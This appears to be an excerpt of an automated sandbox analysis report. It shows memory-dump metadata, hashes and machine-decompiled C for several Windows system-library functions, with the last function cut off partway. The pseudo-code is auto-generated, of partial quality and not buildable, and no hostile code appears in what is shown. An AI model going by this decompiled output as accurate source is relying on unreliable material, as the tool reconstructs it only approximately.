                                                                                                                                    0x00000000
                                                                                                                                    0x04b73e31
                                                                                                                                    0x04b73e20
                                                                                                                                    0x04b73e20
                                                                                                                                    0x04b73e35
                                                                                                                                    0x00000000
                                                                                                                                    0x04b73de9
                                                                                                                                    0x04b73de9
                                                                                                                                    0x04b73de9
                                                                                                                                    0x04b73dee
                                                                                                                                    0x04b73dfd
                                                                                                                                    0x04b73dff
                                                                                                                                    0x04b73e02
                                                                                                                                    0x04b73e05
                                                                                                                                    0x04b73e05
                                                                                                                                    0x00000000
                                                                                                                                    0x04b73df0
                                                                                                                                    0x04b73de7
                                                                                                                                    0x04bae78f
                                                                                                                                    0x04bae794
                                                                                                                                    0x04b73d79
                                                                                                                                    0x04b73d84
                                                                                                                                    0x04b73d89
                                                                                                                                    0x04b73d8e
                                                                                                                                    0x00000000
                                                                                                                                    0x04bae7a4
                                                                                                                                    0x04b73d96
                                                                                                                                    0x04b73d9a
                                                                                                                                    0x00000000
                                                                                                                                    0x04b73d9a
                                                                                                                                    0x00000000
                                                                                                                                    0x04bae794
                                                                                                                                    0x04b73d6e
                                                                                                                                    0x04b73d73
                                                                                                                                    0x00000000
                                                                                                                                    0x04bae7b5
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 859a738e5a044355457ddc5d59d1fd5ec350cb893a1ccbd2f56142440889aadd
                                                                                                                                    • Instruction ID: e171fd617bfa804afd56be0a86a598c9d4c459c29ce77dde41909938448962bc
                                                                                                                                    • Opcode Fuzzy Hash: 859a738e5a044355457ddc5d59d1fd5ec350cb893a1ccbd2f56142440889aadd
                                                                                                                                    • Instruction Fuzzy Hash: 3531BE31704615DBC7248F29C841A6ABBE5EF95700B05C4EAE865CB360F730E840F7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BB7016, Relevance: .1, Instructions: 104COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E04BB7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4c2d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04BB6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04BB6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04B57D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04B79AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04B7B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04B54620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                                    0x04bb7016
                                                                                                                                    0x04bb701e
                                                                                                                                    0x04bb702b
                                                                                                                                    0x04bb7033
                                                                                                                                    0x04bb7037
                                                                                                                                    0x04bb703c
                                                                                                                                    0x04bb703e
                                                                                                                                    0x04bb7041
                                                                                                                                    0x04bb7045
                                                                                                                                    0x04bb704a
                                                                                                                                    0x04bb7050
                                                                                                                                    0x04bb7055
                                                                                                                                    0x04bb705a
                                                                                                                                    0x04bb7062
                                                                                                                                    0x04bb7062
                                                                                                                                    0x04bb705a
                                                                                                                                    0x04bb7064
                                                                                                                                    0x04bb7064
                                                                                                                                    0x04bb7067
                                                                                                                                    0x04bb7071
                                                                                                                                    0x04bb7096
                                                                                                                                    0x04bb709b
                                                                                                                                    0x04bb70a2
                                                                                                                                    0x04bb70a6
                                                                                                                                    0x04bb70a7
                                                                                                                                    0x04bb70ad
                                                                                                                                    0x04bb70b3
                                                                                                                                    0x04bb70b6
                                                                                                                                    0x04bb70bb
                                                                                                                                    0x04bb70c3
                                                                                                                                    0x04bb70c3
                                                                                                                                    0x04bb70c6
                                                                                                                                    0x04bb70cd
                                                                                                                                    0x04bb70dd
                                                                                                                                    0x04bb70e0
                                                                                                                                    0x04bb70e2
                                                                                                                                    0x04bb70e2
                                                                                                                                    0x04bb70ee
                                                                                                                                    0x04bb7101
                                                                                                                                    0x04bb70f0
                                                                                                                                    0x04bb70f9
                                                                                                                                    0x04bb70f9
                                                                                                                                    0x04bb710a
                                                                                                                                    0x04bb710e
                                                                                                                                    0x04bb7112
                                                                                                                                    0x04bb7117
                                                                                                                                    0x04bb7118
                                                                                                                                    0x04bb7118
                                                                                                                                    0x04bb70bb
                                                                                                                                    0x04bb711d
                                                                                                                                    0x04bb7123
                                                                                                                                    0x04bb7131
                                                                                                                                    0x04bb7131
                                                                                                                                    0x04bb7136
                                                                                                                                    0x04bb713d
                                                                                                                                    0x04bb713e
                                                                                                                                    0x04bb713f
                                                                                                                                    0x04bb714a
                                                                                                                                    0x04bb714a
                                                                                                                                    0x04bb7084
                                                                                                                                    0x04bb7088
                                                                                                                                    0x00000000
                                                                                                                                    0x04bb708e
                                                                                                                                    0x04bb708e
                                                                                                                                    0x04bb7092
                                                                                                                                    0x00000000
                                                                                                                                    0x04bb7092

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2e0e407b416d1274603d6f16ec410fdc754bfa922a9d16cf435cf6ca6e085298
                                                                                                                                    • Instruction ID: 936d665849870f30195055c66e90d7f83e87b2fa97cc71221a234b3879fa8814
                                                                                                                                    • Opcode Fuzzy Hash: 2e0e407b416d1274603d6f16ec410fdc754bfa922a9d16cf435cf6ca6e085298
                                                                                                                                    • Instruction Fuzzy Hash: 663180726047519BC320DF68C941ABAB7A5FFC8700F044A69F89587790EB70F914CBE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B5C182, Relevance: .1, Instructions: 104COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E04B5C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04B57D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04C08D34(_v8, _t80);
					}
					E04B52280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04B4FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04C08833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04B4FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04B7B180();
						if(_a4 != 0) {
							E04B52280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04B5BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04B5BB2D(_t16, _t15);
						E04B5B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04B4FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04B4FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04B4FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                                    0x04b5c18d
                                                                                                                                    0x04b5c18f
                                                                                                                                    0x04b5c191
                                                                                                                                    0x04b5c19b
                                                                                                                                    0x04b5c1a0
                                                                                                                                    0x04b5c1d4
                                                                                                                                    0x04b5c1de
                                                                                                                                    0x04ba2d6e
                                                                                                                                    0x04b5c1e4
                                                                                                                                    0x04b5c1e4
                                                                                                                                    0x04b5c1e4
                                                                                                                                    0x04b5c1ec
                                                                                                                                    0x04ba2d7d
                                                                                                                                    0x04ba2d7d
                                                                                                                                    0x04b5c1f3
                                                                                                                                    0x04b5c1ff
                                                                                                                                    0x04ba2d88
                                                                                                                                    0x04ba2d8d
                                                                                                                                    0x04ba2d94
                                                                                                                                    0x04ba2d94
                                                                                                                                    0x04ba2d9f
                                                                                                                                    0x04ba2da4
                                                                                                                                    0x04ba2dab
                                                                                                                                    0x04ba2db0
                                                                                                                                    0x04ba2db2
                                                                                                                                    0x04ba2db3
                                                                                                                                    0x04ba2db4
                                                                                                                                    0x04ba2dbc
                                                                                                                                    0x04ba2dc3
                                                                                                                                    0x04ba2dc3
                                                                                                                                    0x04b5c205
                                                                                                                                    0x04b5c205
                                                                                                                                    0x04b5c208
                                                                                                                                    0x04b5c20e
                                                                                                                                    0x04b5c211
                                                                                                                                    0x04b5c216
                                                                                                                                    0x04b5c219
                                                                                                                                    0x04b5c21f
                                                                                                                                    0x04b5c222
                                                                                                                                    0x04b5c22c
                                                                                                                                    0x04b5c234
                                                                                                                                    0x04b5c23a
                                                                                                                                    0x04b5c23f
                                                                                                                                    0x04b5c245
                                                                                                                                    0x04b5c24b
                                                                                                                                    0x04b5c251
                                                                                                                                    0x04b5c25a
                                                                                                                                    0x04b5c276
                                                                                                                                    0x04b5c27d
                                                                                                                                    0x04b5c27d
                                                                                                                                    0x04b5c25c
                                                                                                                                    0x04b5c25c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5c25e
                                                                                                                                    0x04b5c1a4
                                                                                                                                    0x04b5c1aa
                                                                                                                                    0x04b5c1b3
                                                                                                                                    0x04b5c265
                                                                                                                                    0x04b5c26c
                                                                                                                                    0x04b5c26c
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                    • Instruction ID: a80130ef1c69d1941d5fa72ba1f1a86701aa0106c4aff43570cb4d3d4e3057ff
                                                                                                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                    • Instruction Fuzzy Hash: 6E314871705646AFEB04EBB4C480BE9FB65FF42248F0481DAC91C47351DB357A15EBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B6E730, Relevance: .1, Instructions: 89COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                    			E04B6E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04B79670() < 0) {
					L04B8DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4c27b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04B54620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04B6E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                                                    0x04b6e730
                                                                                                                                    0x04b6e736
                                                                                                                                    0x04b6e738
                                                                                                                                    0x04b6e73d
                                                                                                                                    0x04b6e73e
                                                                                                                                    0x04b6e740
                                                                                                                                    0x04b6e749
                                                                                                                                    0x04b6e765
                                                                                                                                    0x04b6e76a
                                                                                                                                    0x04b6e76b
                                                                                                                                    0x04b6e76c
                                                                                                                                    0x04b6e76d
                                                                                                                                    0x04b6e76e
                                                                                                                                    0x04b6e76f
                                                                                                                                    0x04b6e775
                                                                                                                                    0x04b6e777
                                                                                                                                    0x04b6e77e
                                                                                                                                    0x04bab675
                                                                                                                                    0x04b6e784
                                                                                                                                    0x04b6e784
                                                                                                                                    0x04b6e789
                                                                                                                                    0x04b6e7a8
                                                                                                                                    0x04b6e7ac
                                                                                                                                    0x04b6e807
                                                                                                                                    0x04b6e7ae
                                                                                                                                    0x04b6e7ae
                                                                                                                                    0x04b6e7b1
                                                                                                                                    0x04b6e7b4
                                                                                                                                    0x04b6e7b9
                                                                                                                                    0x04b6e7c0
                                                                                                                                    0x04b6e7c4
                                                                                                                                    0x04b6e7ca
                                                                                                                                    0x04b6e7cc
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7d3
                                                                                                                                    0x04b6e7d6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7ff
                                                                                                                                    0x04b6e802
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7f9
                                                                                                                                    0x04b6e7fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7f3
                                                                                                                                    0x04b6e7f6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7ed
                                                                                                                                    0x04b6e7f0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7e7
                                                                                                                                    0x04b6e7ea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04bab685
                                                                                                                                    0x04bab688
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04bab682
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6e7cc
                                                                                                                                    0x04b6e7d9
                                                                                                                                    0x04b6e7dc
                                                                                                                                    0x04b6e7de
                                                                                                                                    0x04b6e7de
                                                                                                                                    0x04b6e7ac
                                                                                                                                    0x04b6e7e4
                                                                                                                                    0x04b6e74b
                                                                                                                                    0x04b6e751
                                                                                                                                    0x04b6e759
                                                                                                                                    0x04b6e761
                                                                                                                                    0x04b6e761

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ea58b66ea911a8ad6e1be56c1d5c9201e2874c3f1b62c5dd65f65c91f101a2e1
                                                                                                                                    • Instruction ID: a5c61fbbd24b843afb0536dafc87e4c3f94ba39cfe84a07bc1489a19371fd787
                                                                                                                                    • Opcode Fuzzy Hash: ea58b66ea911a8ad6e1be56c1d5c9201e2874c3f1b62c5dd65f65c91f101a2e1
                                                                                                                                    • Instruction Fuzzy Hash: 6F318C79A14249EFE704CF58D840B9AB7E8FB18314F1482A6F918CB341E635EC90CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B6BC2C, Relevance: .1, Instructions: 88COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                    			E04B6BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4c26100; // 0x15
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04B52280(0xd, 0x17cbf1a0);
				_t41 =  *0x4c260f8; // 0x0
				if(_t41 != 0) {
					 *0x4c260f8 =  *_t41;
					 *0x4c260fc =  *0x4c260fc + 0xffff;
				}
				E04B4FFB0(_t41, 0x800, 0x17cbf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4c260f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04B54620(0x4c26100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4c26100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                                                    0x04b6bc36
                                                                                                                                    0x04b6bc42
                                                                                                                                    0x04b6bc45
                                                                                                                                    0x04b6bc4a
                                                                                                                                    0x04b6bd35
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6bc50
                                                                                                                                    0x04b6bc50
                                                                                                                                    0x04b6bc58
                                                                                                                                    0x04b6bc5a
                                                                                                                                    0x04b6bc60
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04baa4f2
                                                                                                                                    0x04baa4f6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04baa4fc
                                                                                                                                    0x04b6bc79
                                                                                                                                    0x04b6bc7e
                                                                                                                                    0x04b6bc86
                                                                                                                                    0x04b6bd16
                                                                                                                                    0x04b6bd20
                                                                                                                                    0x04b6bd20
                                                                                                                                    0x04b6bc8d
                                                                                                                                    0x04b6bc94
                                                                                                                                    0x04b6bcbd
                                                                                                                                    0x04b6bcca
                                                                                                                                    0x04b6bccb
                                                                                                                                    0x04b6bccc
                                                                                                                                    0x04b6bccd
                                                                                                                                    0x04b6bcce
                                                                                                                                    0x04b6bcd4
                                                                                                                                    0x04b6bcea
                                                                                                                                    0x04b6bcee
                                                                                                                                    0x04b6bcf2
                                                                                                                                    0x04b6bd00
                                                                                                                                    0x04b6bd04
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6bc96
                                                                                                                                    0x04b6bcab
                                                                                                                                    0x04b6bcaf
                                                                                                                                    0x04b6bd2c
                                                                                                                                    0x04b6bd2c
                                                                                                                                    0x04b6bd09
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6bd09
                                                                                                                                    0x04b6bcb1
                                                                                                                                    0x04b6bcb5
                                                                                                                                    0x04b6bcbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6bcbb

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 932596f895fe68c7b6d66fc20cab630c8163beb81c3f2dcd5f8e3a765a22eec3
                                                                                                                                    • Instruction ID: 859810ded632b949348846c72a82802b958e89eed2c3d5b4144628c05df1aabc
                                                                                                                                    • Opcode Fuzzy Hash: 932596f895fe68c7b6d66fc20cab630c8163beb81c3f2dcd5f8e3a765a22eec3
                                                                                                                                    • Instruction Fuzzy Hash: 4831013A7146659BDB11DF58C5807A673B4FB18314F1000B8ED46EF201EBB9FE05ABA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B39100, Relevance: .1, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E04B39100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4c0f6e8);
				E04B8D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04C088F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04B8D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4c286c0; // 0x9307b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4c286b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04B52280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04C088F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04B7AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4c2b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4c284c0;
										if(_t69 >=  *0x4c284c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
